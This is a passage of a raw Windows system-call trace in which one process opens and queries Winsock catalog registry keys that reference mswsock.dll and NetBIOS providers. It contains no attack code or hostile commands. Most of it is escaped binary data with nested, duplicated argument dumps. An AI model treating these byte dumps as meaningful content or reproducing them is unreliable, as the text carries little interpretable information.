\0[\0\\0D\0e\0v\0i\0c\0e\0\\0N\0e\0t\0B\0T\0_\0T\0c\0p\0i\0p\0_\0{\09\07\0C\02\0D\09\0F\04\0-\06\09\05\04\0-\04\0E\0B\03\0-\08\0\0\0\0\0\204\3\0\0&\12\0\0\344\4\0\0\200\3\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0\334\0\0\0&\12\0\0\344\4\0\0\200\3\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0'\12\0\0\344\4\0\0\200\3\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0\330\0\0\0D\360\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\00\314\24\0\0\0\0\00\00\00\00\00\00\00\00\00\00\01\03\0'\12\0\0\344\4\0\0\200\3\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0\334\0\0\0(\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0\0\0"\0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0(\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0)\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0\0\0"\0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) }, 900, ) == 0x0 02598 896 NtClose (220, ... ) == 0x0 02599 896 NtOpenKey (0x20019, {24, 216, 0x40, 0, 0, (0x20019, {24, 216, 0x40, 0, 0, "000000000013"}, ... 220, ) }, ... 220, ) == 0x0 02600 896 NtQueryValueKey (220, (220, "PackedCatalogItem", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_BUFFER_OVERFLOW 02601 896 NtQueryValueKey (220, (220, "PackedCatalogItem", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_BUFFER_OVERFLOW 02602 896 NtAllocateVirtualMemory (-1, 1376256, 0, 4096, 4096, 4, ... 1376256, 4096, ) == 0x0 02603 896 NtQueryValueKey (220, (220, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\mswsock.dll\0\26\0\10@w\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0{\1\11\0;\0\16\1X\253\26\0\10@w\16\09\01\0A\06\0F\0E\02\05\02\0D\03\0F\0B\08\0E\06\0C\0C\07\06\0C\06\03\0F\09\0B\0C\0D\04\0C\07\01\0E\0B\00\0\0\0\2404\2002\0W\14\0\14\0\317\1\15\10Q0,\6\12+\6\1\4\1\2027\2\1\31\242\36\200\34\0<\0<\0<\0O\0b\0s\0o\0l\0e\0t\0e\0>\0>\0>0!0\11\6\5+\16\3\2\32\5\16\0\2\0\0\0\0\0\0\0\0\0\0\0\0\0\10\0\0\00\30_\215s\302\317\21\225\310\0\200_H\241\222\31\4\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\21\0\0\0\24\0\0\0\24\0\0\0\5\0\0\0\0\0\0\200\0\0\0\0\0\0\0\0\0\0\0\0\0\372\0\0\0\0\0\0M\0S\0A\0F\0D\0 \0N\0e\0t\0B\0I\0O\0S\0 \0[\0\\0D\0e\0v\0i\0c\0e\0\\0N\0e\0t\0B\0T\0_\0T\0c\0p\0i\0p\0_\0{\00\0D\04\03\00\0A\06\0F\0-\00\04\01\00\0-\04\0A\06\08\0-\09\0\0\0\0\0\204\3\0\0,\12\0\0\344\4\0\0\200\3\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0\334\0\0\0,\12\0\0\344\4\0\0\200\3\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0-\12\0\0\344\4\0\0\200\3\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0\330\0\0\0D\360\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\00\314\24\0\0\0\0\00\00\00\00\00\00\00\00\00\00\01\04\0-\12\0\0\344\4\0\0\200\3\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0\334\0\0\0.\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0\0\0"\0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0.\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0/\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0\0\0"\0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) , Partial, 900, ... TitleIdx=0, Type=3, Data= (220, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\mswsock.dll\0\26\0\10@w\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0{\1\11\0;\0\16\1X\253\26\0\10@w\16\09\01\0A\06\0F\0E\02\05\02\0D\03\0F\0B\08\0E\06\0C\0C\07\06\0C\06\03\0F\09\0B\0C\0D\04\0C\07\01\0E\0B\00\0\0\0\2404\2002\0W\14\0\14\0\317\1\15\10Q0,\6\12+\6\1\4\1\2027\2\1\31\242\36\200\34\0<\0<\0<\0O\0b\0s\0o\0l\0e\0t\0e\0>\0>\0>0!0\11\6\5+\16\3\2\32\5\16\0\2\0\0\0\0\0\0\0\0\0\0\0\0\0\10\0\0\00\30_\215s\302\317\21\225\310\0\200_H\241\222\31\4\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\21\0\0\0\24\0\0\0\24\0\0\0\5\0\0\0\0\0\0\200\0\0\0\0\0\0\0\0\0\0\0\0\0\372\0\0\0\0\0\0M\0S\0A\0F\0D\0 \0N\0e\0t\0B\0I\0O\0S\0 \0[\0\\0D\0e\0v\0i\0c\0e\0\\0N\0e\0t\0B\0T\0_\0T\0c\0p\0i\0p\0_\0{\00\0D\04\03\00\0A\06\0F\0-\00\04\01\00\0-\04\0A\06\08\0-\09\0\0\0\0\0\204\3\0\0,\12\0\0\344\4\0\0\200\3\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0\334\0\0\0,\12\0\0\344\4\0\0\200\3\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0-\12\0\0\344\4\0\0\200\3\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0\330\0\0\0D\360\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\00\314\24\0\0\0\0\00\00\00\00\00\00\00\00\00\00\01\04\0-\12\0\0\344\4\0\0\200\3\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0\334\0\0\0.\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0\0\0"\0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0.\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0/\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0\0\0"\0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) \0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0.\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0/\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0\0\0 (220, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\mswsock.dll\0\26\0\10@w\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0{\1\11\0;\0\16\1X\253\26\0\10@w\16\09\01\0A\06\0F\0E\02\05\02\0D\03\0F\0B\08\0E\06\0C\0C\07\06\0C\06\03\0F\09\0B\0C\0D\04\0C\07\01\0E\0B\00\0\0\0\2404\2002\0W\14\0\14\0\317\1\15\10Q0,\6\12+\6\1\4\1\2027\2\1\31\242\36\200\34\0<\0<\0<\0O\0b\0s\0o\0l\0e\0t\0e\0>\0>\0>0!0\11\6\5+\16\3\2\32\5\16\0\2\0\0\0\0\0\0\0\0\0\0\0\0\0\10\0\0\00\30_\215s\302\317\21\225\310\0\200_H\241\222\31\4\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\21\0\0\0\24\0\0\0\24\0\0\0\5\0\0\0\0\0\0\200\0\0\0\0\0\0\0\0\0\0\0\0\0\372\0\0\0\0\0\0M\0S\0A\0F\0D\0 \0N\0e\0t\0B\0I\0O\0S\0 \0[\0\\0D\0e\0v\0i\0c\0e\0\\0N\0e\0t\0B\0T\0_\0T\0c\0p\0i\0p\0_\0{\00\0D\04\03\00\0A\06\0F\0-\00\04\01\00\0-\04\0A\06\08\0-\09\0\0\0\0\0\204\3\0\0,\12\0\0\344\4\0\0\200\3\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0\334\0\0\0,\12\0\0\344\4\0\0\200\3\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0-\12\0\0\344\4\0\0\200\3\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0\330\0\0\0D\360\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\00\314\24\0\0\0\0\00\00\00\00\00\00\00\00\00\00\01\04\0-\12\0\0\344\4\0\0\200\3\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0\334\0\0\0.\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0\0\0"\0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\0.\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0/\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0\0\0"\0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) }, 900, ) == 0x0 02604 896 NtClose (220, ... ) == 0x0 02605 896 NtOpenKey (0x20019, {24, 216, 0x40, 0, 0, (0x20019, {24, 216, 0x40, 0, 0, "000000000014"}, ... 220, ) }, ... 220, ) == 0x0 02606 896 NtQueryValueKey (220, (220, "PackedCatalogItem", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_BUFFER_OVERFLOW 02607 896 NtQueryValueKey (220, (220, "PackedCatalogItem", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_BUFFER_OVERFLOW 02608 896 NtQueryValueKey (220, (220, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\mswsock.dll\0\26\0\10@w\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0{\1\11\0;\0\16\1X\253\26\0\10@w\16\09\01\0A\06\0F\0E\02\05\02\0D\03\0F\0B\08\0E\06\0C\0C\07\06\0C\06\03\0F\09\0B\0C\0D\04\0C\07\01\0E\0B\00\0\0\0\2404\2002\0W\14\0\14\0\317\1\15\10Q0,\6\12+\6\1\4\1\2027\2\1\31\242\36\200\34\0<\0<\0<\0O\0b\0s\0o\0l\0e\0t\0e\0>\0>\0>0!0\11\6\5+\16\3\2\32\5\11\2\2\0\0\0\0\0\0\0\0\0\0\0\0\0\10\0\0\00\30_\215s\302\317\21\225\310\0\200_H\241\222\32\4\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\21\0\0\0\24\0\0\0\24\0\0\0\2\0\0\0\0\0\0\200\0\0\0\0\0\0\0\0\0\0\0\0\0\372\0\0\0\0\0\0M\0S\0A\0F\0D\0 \0N\0e\0t\0B\0I\0O\0S\0 \0[\0\\0D\0e\0v\0i\0c\0e\0\\0N\0e\0t\0B\0T\0_\0T\0c\0p\0i\0p\0_\0{\00\0D\04\03\00\0A\06\0F\0-\00\04\01\00\0-\04\0A\06\08\0-\09\0\0\0\0\0\204\3\0\01\12\0\0\344\4\0\0\200\3\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0\334\0\0\01\12\0\0\344\4\0\0\200\3\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\02\12\0\0\344\4\0\0\200\3\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0\330\0\0\0D\360\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\00\314\24\0\0\0\0\00\00\00\00\00\00\00\00\00\00\01\05\02\12\0\0\344\4\0\0\200\3\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0\334\0\0\03\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0\0\0"\0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\03\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\04\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0\0\0"\0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) , Partial, 900, ... TitleIdx=0, Type=3, Data= (220, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\mswsock.dll\0\26\0\10@w\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0{\1\11\0;\0\16\1X\253\26\0\10@w\16\09\01\0A\06\0F\0E\02\05\02\0D\03\0F\0B\08\0E\06\0C\0C\07\06\0C\06\03\0F\09\0B\0C\0D\04\0C\07\01\0E\0B\00\0\0\0\2404\2002\0W\14\0\14\0\317\1\15\10Q0,\6\12+\6\1\4\1\2027\2\1\31\242\36\200\34\0<\0<\0<\0O\0b\0s\0o\0l\0e\0t\0e\0>\0>\0>0!0\11\6\5+\16\3\2\32\5\11\2\2\0\0\0\0\0\0\0\0\0\0\0\0\0\10\0\0\00\30_\215s\302\317\21\225\310\0\200_H\241\222\32\4\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\21\0\0\0\24\0\0\0\24\0\0\0\2\0\0\0\0\0\0\200\0\0\0\0\0\0\0\0\0\0\0\0\0\372\0\0\0\0\0\0M\0S\0A\0F\0D\0 \0N\0e\0t\0B\0I\0O\0S\0 \0[\0\\0D\0e\0v\0i\0c\0e\0\\0N\0e\0t\0B\0T\0_\0T\0c\0p\0i\0p\0_\0{\00\0D\04\03\00\0A\06\0F\0-\00\04\01\00\0-\04\0A\06\08\0-\09\0\0\0\0\0\204\3\0\01\12\0\0\344\4\0\0\200\3\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0\334\0\0\01\12\0\0\344\4\0\0\200\3\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\02\12\0\0\344\4\0\0\200\3\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0\330\0\0\0D\360\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\00\314\24\0\0\0\0\00\00\00\00\00\00\00\00\00\00\01\05\02\12\0\0\344\4\0\0\200\3\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0\334\0\0\03\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0\0\0"\0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\03\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\04\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0\0\0"\0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) \0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\03\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\04\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0\0\0 (220, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\mswsock.dll\0\26\0\10@w\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0{\1\11\0;\0\16\1X\253\26\0\10@w\16\09\01\0A\06\0F\0E\02\05\02\0D\03\0F\0B\08\0E\06\0C\0C\07\06\0C\06\03\0F\09\0B\0C\0D\04\0C\07\01\0E\0B\00\0\0\0\2404\2002\0W\14\0\14\0\317\1\15\10Q0,\6\12+\6\1\4\1\2027\2\1\31\242\36\200\34\0<\0<\0<\0O\0b\0s\0o\0l\0e\0t\0e\0>\0>\0>0!0\11\6\5+\16\3\2\32\5\11\2\2\0\0\0\0\0\0\0\0\0\0\0\0\0\10\0\0\00\30_\215s\302\317\21\225\310\0\200_H\241\222\32\4\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\21\0\0\0\24\0\0\0\24\0\0\0\2\0\0\0\0\0\0\200\0\0\0\0\0\0\0\0\0\0\0\0\0\372\0\0\0\0\0\0M\0S\0A\0F\0D\0 \0N\0e\0t\0B\0I\0O\0S\0 \0[\0\\0D\0e\0v\0i\0c\0e\0\\0N\0e\0t\0B\0T\0_\0T\0c\0p\0i\0p\0_\0{\00\0D\04\03\00\0A\06\0F\0-\00\04\01\00\0-\04\0A\06\08\0-\09\0\0\0\0\0\204\3\0\01\12\0\0\344\4\0\0\200\3\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0\334\0\0\01\12\0\0\344\4\0\0\200\3\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\02\12\0\0\344\4\0\0\200\3\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0\330\0\0\0D\360\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\00\314\24\0\0\0\0\00\00\00\00\00\00\00\00\00\00\01\05\02\12\0\0\344\4\0\0\200\3\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0\334\0\0\03\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0\0\0"\0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\03\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\04\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0\0\0"\0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) }, 900, ) == 0x0 02609 896 NtClose (220, ... ) == 0x0 02610 896 NtOpenKey (0x20019, {24, 216, 0x40, 0, 0, (0x20019, {24, 216, 0x40, 0, 0, "000000000015"}, ... 220, ) }, ... 220, ) == 0x0 02611 896 NtQueryValueKey (220, (220, "PackedCatalogItem", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_BUFFER_OVERFLOW 02612 896 NtQueryValueKey (220, (220, "PackedCatalogItem", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_BUFFER_OVERFLOW 02613 896 NtQueryValueKey (220, (220, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\mswsock.dll\0\26\0\10@w\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0{\1\11\0;\0\16\1X\253\26\0\10@w\16\09\01\0A\06\0F\0E\02\05\02\0D\03\0F\0B\08\0E\06\0C\0C\07\06\0C\06\03\0F\09\0B\0C\0D\04\0C\07\01\0E\0B\00\0\0\0\2404\2002\0W\14\0\14\0\317\1\15\10Q0,\6\12+\6\1\4\1\2027\2\1\31\242\36\200\34\0<\0<\0<\0O\0b\0s\0o\0l\0e\0t\0e\0>\0>\0>0!0\11\6\5+\16\3\2\32\5\16\0\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\00\30_\215s\302\317\21\225\310\0\200_H\241\222\33\4\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\21\0\0\0\24\0\0\0\24\0\0\0\5\0\0\0\377\377\377\377\0\0\0\0\0\0\0\0\0\0\0\0\0\372\0\0\0\0\0\0M\0S\0A\0F\0D\0 \0N\0e\0t\0B\0I\0O\0S\0 \0[\0\\0D\0e\0v\0i\0c\0e\0\\0N\0e\0t\0B\0T\0_\0T\0c\0p\0i\0p\0_\0{\08\0A\0D\04\0D\08\00\06\0-\00\08\01\0B\0-\04\04\04\06\0-\0A\0\0\0\0\0\204\3\0\06\12\0\0\344\4\0\0\200\3\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0\334\0\0\06\12\0\0\344\4\0\0\200\3\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\07\12\0\0\344\4\0\0\200\3\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0\330\0\0\0D\360\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\00\314\24\0\0\0\0\00\00\00\00\00\00\00\00\00\00\01\06\07\12\0\0\344\4\0\0\200\3\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0\334\0\0\08\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0\0\0"\0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\08\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\09\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0\0\0"\0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) , Partial, 900, ... TitleIdx=0, Type=3, Data= (220, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\mswsock.dll\0\26\0\10@w\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0{\1\11\0;\0\16\1X\253\26\0\10@w\16\09\01\0A\06\0F\0E\02\05\02\0D\03\0F\0B\08\0E\06\0C\0C\07\06\0C\06\03\0F\09\0B\0C\0D\04\0C\07\01\0E\0B\00\0\0\0\2404\2002\0W\14\0\14\0\317\1\15\10Q0,\6\12+\6\1\4\1\2027\2\1\31\242\36\200\34\0<\0<\0<\0O\0b\0s\0o\0l\0e\0t\0e\0>\0>\0>0!0\11\6\5+\16\3\2\32\5\16\0\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\00\30_\215s\302\317\21\225\310\0\200_H\241\222\33\4\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\21\0\0\0\24\0\0\0\24\0\0\0\5\0\0\0\377\377\377\377\0\0\0\0\0\0\0\0\0\0\0\0\0\372\0\0\0\0\0\0M\0S\0A\0F\0D\0 \0N\0e\0t\0B\0I\0O\0S\0 \0[\0\\0D\0e\0v\0i\0c\0e\0\\0N\0e\0t\0B\0T\0_\0T\0c\0p\0i\0p\0_\0{\08\0A\0D\04\0D\08\00\06\0-\00\08\01\0B\0-\04\04\04\06\0-\0A\0\0\0\0\0\204\3\0\06\12\0\0\344\4\0\0\200\3\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0\334\0\0\06\12\0\0\344\4\0\0\200\3\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\07\12\0\0\344\4\0\0\200\3\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0\330\0\0\0D\360\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\00\314\24\0\0\0\0\00\00\00\00\00\00\00\00\00\00\01\06\07\12\0\0\344\4\0\0\200\3\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0\334\0\0\08\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0\0\0"\0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\08\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\09\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0\0\0"\0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) \0\12\2\0\374\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\24\0\2\0\0\0\220\0\0\08\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\09\12\0\0\344\4\0\0\200\3\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\334\0\0\0\0\0\0\0 (220, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, 